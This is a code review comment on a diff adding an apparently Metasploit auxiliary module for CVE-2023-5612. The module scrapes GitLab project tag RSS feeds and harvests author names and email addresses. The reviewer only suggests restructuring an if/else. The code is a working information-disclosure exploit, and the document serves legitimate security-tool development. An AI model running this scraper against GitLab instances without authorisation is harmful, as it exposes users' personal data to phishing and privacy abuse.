modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb

```diff
@@ -0,0 +1,115 @@
+          [ 'URL', 'https://hackerone.com/reports/2208790'],
+          [ 'CVE', '2023-5612']
+        ],
+        'DisclosureDate' => '2024-01-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the GitLab Application', '/']),
+        OptString.new('TARGETPROJECT', [ false, 'Workspace and project to target', nil])
+      ]
+    )
+  end
+
+  def get_contents(tags)
+    print_status('Check RSS tags feed for: ' + tags)
+
+    # Tag needs to be lower case, so...
+    tags = tags.split('/')[0] + '/' + tags.split('/')[1].downcase
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, tags, '-', 'tags'),
+      'method' => 'GET', 'vars_get' => { 'format' => 'atom' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200 || res.code == 301
+
+    xml_res = res.get_xml_document
+
+    # Check to see if there are any tags with authors
+    author_element = 'author'
+    not_found = xml_res.xpath("//xmlns:#{author_element}").empty?
+    if not_found
+      print_bad('No tags or authors found')
+    else
+      loot_path = store_loot('gitlab.RSS.info_disclosure', 'application/xml', datastore['RHOST'], xml_res, 'tag_author_info.xml')
+      print_good("Output saved to #{loot_path}")
+
+      # Initialze an empty set so we can dedupe authors based on email address
+      # This only dedupes within a project, not the entirety of Gitlab,
+      # so forks of projects may show duplicate email addresses.
+      unique_emails = Set.new
+
+      xml_res.xpath('//xmlns:author').each do |authors|
+        email = authors.at_xpath('xmlns:email').text
+        next if unique_emails.include?(email)
+
+        name = authors.at_xpath('xmlns:name').text
+        print_good("name: #{name}")
+        print_good("e-mail: #{email}")
+        unique_emails << email
+      end
+    end
+  end
+
+  def run
+    if datastore['TARGETPROJECT'].nil?
+      print_good('Scraping ALL projects...')
+      request = {
+        'uri' => normalize_uri(target_uri.path, '/api/v4/projects'),
+        'method' => 'GET', 'vars_get' => {
+          'output_mode' => 'json'
+        }
+      }
+
+      res = send_request_cgi(request)
+
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 200
+
+      res.get_json_document.each do |entry|
+        tags = entry['path_with_namespace']
+        get_contents(tags)
+      end
+
+    else
+      get_contents(datastore['TARGETPROJECT'].to_s)
+    end
```

Comment:
I would re-arrange this, similar to above.
```
unless datastore['TARGETPROJECT'].nil?
  get_contents(datastore['TARGETPROJECT'].to_s)
  return
end
```

then you can remove the else (and trailing end), and unindent by 1 level